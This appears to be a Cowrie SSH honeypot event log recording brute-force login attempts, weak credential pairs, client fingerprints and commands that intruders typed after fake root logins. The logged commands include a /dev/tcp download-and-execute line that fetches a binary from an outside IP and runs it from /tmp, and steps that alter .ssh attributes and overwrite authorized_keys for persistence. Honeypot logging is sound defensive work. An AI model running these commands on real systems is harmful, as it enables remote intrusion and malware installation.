{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.654749Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.655718Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33160,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b39119874e","protocol":"ssh","message":"New connection: 212.227.235.229:33160 (1.2.3.4:22) [session: b3b39119874e]","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.913355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:04.914247Z","src_ip":"212.227.235.229","session":"b3b39119874e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:05.174771Z","src_ip":"212.227.235.229","session":"b3b39119874e"}
{"eventid":"cowrie.login.failed","username":"user","password":"pass123","message":"login attempt [user/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:07:05.540324Z","src_ip":"134.199.174.250","session":"fb413662b01c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:07:06.334239Z","src_ip":"212.227.235.229","session":"b3b39119874e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:06.795178Z","src_ip":"134.199.174.250","session":"fb413662b01c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:07.596696Z","src_ip":"212.227.235.229","session":"b3b39119874e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33168,"dst_ip":"1.2.3.4","dst_port":22,"session":"962385bb1bee","protocol":"ssh","message":"New connection: 212.227.235.229:33168 (1.2.3.4:22) [session: 962385bb1bee]","sensor":"my-vps","timestamp":"2025-09-08T13:07:07.951221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:07.952667Z","src_ip":"212.227.235.229","session":"962385bb1bee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:08.320070Z","src_ip":"212.227.235.229","session":"962385bb1bee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:07:09.688302Z","src_ip":"212.227.235.229","session":"962385bb1bee"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:10.048020Z","src_ip":"212.227.235.229","session":"435d501d9451"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:10.048735Z","src_ip":"212.227.235.229","session":"962385bb1bee"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:19.644184Z","src_ip":"212.227.235.229","session":"dc06cf8488b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32936,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3dbb447a9f6","protocol":"ssh","message":"New connection: 212.227.235.229:32936 (1.2.3.4:22) [session: f3dbb447a9f6]","sensor":"my-vps","timestamp":"2025-09-08T13:07:23.471661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T13:07:23.472622Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T13:07:23.473504Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T13:07:24.100922Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37524,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bcbd62502b2","protocol":"ssh","message":"New connection: 212.227.235.229:37524 (1.2.3.4:22) [session: 9bcbd62502b2]","sensor":"my-vps","timestamp":"2025-09-08T13:07:25.078865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:25.079731Z","src_ip":"212.227.235.229","session":"9bcbd62502b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:25.205124Z","src_ip":"212.227.235.229","session":"9bcbd62502b2"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:07:25.310178Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:07:25.779205Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"changeme","message":"login attempt [daniel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T13:07:25.780596Z","src_ip":"212.227.235.229","session":"9bcbd62502b2"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/47.239.9.4/60106 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1S2J77bv7i && chmod +x /tmp/1S2J77bv7i && /tmp/1S2J77bv7i +yvZLNU4yCzELuH9LcUk0DDXKsU8/vok2SrXLt8p2S339ybBLtcy1D7FLPnhLsMryDLUK9ko9/Uqxy/UMsYqwDL9+y7ZKtEu1ybEJvn/LcMmxjTRMMUv+eEtwSfIMdAmzSr//i/PPtI3yCzEJeH2MsMk0DDXLsE8+/gyxS3RLt8u2S77+SbBLtcy1T7FLPnhLsMryDLVL9ku9/Uqxy/UOMYsxyrh/SjCMNQy0jDGL/n1Kscv1zXGL8Ik4fst2SfRLtcmxib5/y3HJ8Y4yCzFLuH9KMEw1DLeJMEs/v4rxfWRqzbJ0LVm6QoL\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/47.239.9.4/60106 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1S2J77bv7i && chmod +x /tmp/1S2J77bv7i && /tmp/1S2J77bv7i +yvZLNU4yCzELuH9LcUk0DDXKsU8/vok2SrXLt8p2S339ybBLtcy1D7FLPnhLsMryDLUK9ko9/Uqxy/UMsYqwDL9+y7ZKtEu1ybEJvn/LcMmxjTRMMUv+eEtwSfIMdAmzSr//i/PPtI3yCzEJeH2MsMk0DDXLsE8+/gyxS3RLt8u2S77+SbBLtcy1T7FLPnhLsMryDLVL9ku9/Uqxy/UOMYsxyrh/SjCMNQy0jDGL/n1Kscv1zXGL8Ik4fst2SfRLtcmxib5/y3HJ8Y4yCzFLuH9KMEw1DLeJMEs/v4rxfWRqzbJ0LVm6QoL\" &","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.004190Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.command.input","input":"dd bs=1 count=1911588 > /tmp/RamFxG0cn8","message":"CMD: dd bs=1 count=1911588 > /tmp/RamFxG0cn8","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.007710Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/47.239.9.4/60106 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1S2J77bv7i && chmod +x /tmp/1S2J77bv7i && /tmp/1S2J77bv7i +yvZLNU4yCzELuH9LcUk0DDXKsU8/vok2SrXLt8p2S339ybBLtcy1D7FLPnhLsMryDLUK9ko9/Uqxy/UMsYqwDL9+y7ZKtEu1ybEJvn/LcMmxjTRMMUv+eEtwSfIMdAmzSr//i/PPtI3yCzEJeH2MsMk0DDXLsE8+/gyxS3RLt8u2S77+SbBLtcy1T7FLPnhLsMryDLVL9ku9/Uqxy/UOMYsxyrh/SjCMNQy0jDGL/n1Kscv1zXGL8Ik4fst2SfRLtcmxib5/y3HJ8Y4yCzFLuH9KMEw1DLeJMEs/v4rxfWRqzbJ0LVm6QoL\" &0O0O6(6(Qtd?UPX!","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/47.239.9.4/60106 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1S2J77bv7i && chmod +x /tmp/1S2J77bv7i && /tmp/1S2J77bv7i +yvZLNU4yCzELuH9LcUk0DDXKsU8/vok2SrXLt8p2S339ybBLtcy1D7FLPnhLsMryDLUK9ko9/Uqxy/UMsYqwDL9+y7ZKtEu1ybEJvn/LcMmxjTRMMUv+eEtwSfIMdAmzSr//i/PPtI3yCzEJeH2MsMk0DDXLsE8+/gyxS3RLt8u2S77+SbBLtcy1T7FLPnhLsMryDLVL9ku9/Uqxy/UOMYsxyrh/SjCMNQy0jDGL/n1Kscv1zXGL8Ik4fst2SfRLtcmxib5/y3HJ8Y4yCzFLuH9KMEw1DLeJMEs/v4rxfWRqzbJ0LVm6QoL\" &0O0O6(6(Qtd?UPX!","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.223258Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.command.input","input":">D6@/XJ'8","message":"CMD: >D6@/XJ'8","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.229071Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.229995Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.session.file_download","duplicate":false,"outfile":"var/lib/cowrie/downloads/9a45029b646e2d20015695b5541f5fb76eace740bf329dc05af8ea53bd89619c","shasum":"9a45029b646e2d20015695b5541f5fb76eace740bf329dc05af8ea53bd89619c","destfile":"/tmp/RamFxG0cn8","message":"Saved redir contents with SHA-256 9a45029b646e2d20015695b5541f5fb76eace740bf329dc05af8ea53bd89619c to var/lib/cowrie/downloads/9a45029b646e2d20015695b5541f5fb76eace740bf329dc05af8ea53bd89619c","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.231666Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9315263b4df8ea6ba939a1c9a1fdcb3e0f26774e2d6181841c4b8783bab8b9b7","size":1842,"shasum":"9315263b4df8ea6ba939a1c9a1fdcb3e0f26774e2d6181841c4b8783bab8b9b7","duplicate":false,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/9315263b4df8ea6ba939a1c9a1fdcb3e0f26774e2d6181841c4b8783bab8b9b7 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.233207Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.238082Z","src_ip":"212.227.235.229","session":"f3dbb447a9f6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:26.908092Z","src_ip":"212.227.235.229","session":"9bcbd62502b2"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":34018,"dst_ip":"1.2.3.4","dst_port":22,"session":"29baa179824c","protocol":"ssh","message":"New connection: 139.59.14.27:34018 (1.2.3.4:22) [session: 29baa179824c]","sensor":"my-vps","timestamp":"2025-09-08T13:07:27.297799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:27.298907Z","src_ip":"139.59.14.27","session":"29baa179824c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:27.641347Z","src_ip":"139.59.14.27","session":"29baa179824c"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T13:07:29.064503Z","src_ip":"139.59.14.27","session":"29baa179824c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:30.409866Z","src_ip":"139.59.14.27","session":"29baa179824c"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39882,"dst_ip":"1.2.3.4","dst_port":22,"session":"0efd2776e410","protocol":"ssh","message":"New connection: 134.199.174.250:39882 (1.2.3.4:22) [session: 0efd2776e410]","sensor":"my-vps","timestamp":"2025-09-08T13:07:33.263951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:07:33.323770Z","src_ip":"134.199.174.250","session":"0efd2776e410"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:07:33.578346Z","src_ip":"134.199.174.250","session":"0efd2776e410"}
{"eventid":"cowrie.login.failed","username":"user","password":"123abc","message":"login attempt [user/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:07:34.836396Z","src_ip":"134.199.174.250","session":"0efd2776e410"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:36.269372Z","src_ip":"134.199.174.250","session":"0efd2776e410"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40284,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2015ed60e7e","protocol":"ssh","message":"New connection: 212.227.235.229:40284 (1.2.3.4:22) [session: d2015ed60e7e]","sensor":"my-vps","timestamp":"2025-09-08T13:07:43.184553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:43.189418Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:43.345153Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:07:43.971887Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:07:44.301373Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.302147Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.303062Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.461816Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63878,"dst_ip":"1.2.3.4","dst_port":22,"session":"396717e96e52","protocol":"ssh","message":"New connection: 217.72.205.35:63878 (1.2.3.4:22) [session: 396717e96e52]","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.588017Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.589137Z","src_ip":"217.72.205.35","session":"396717e96e52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:07:44.832951Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
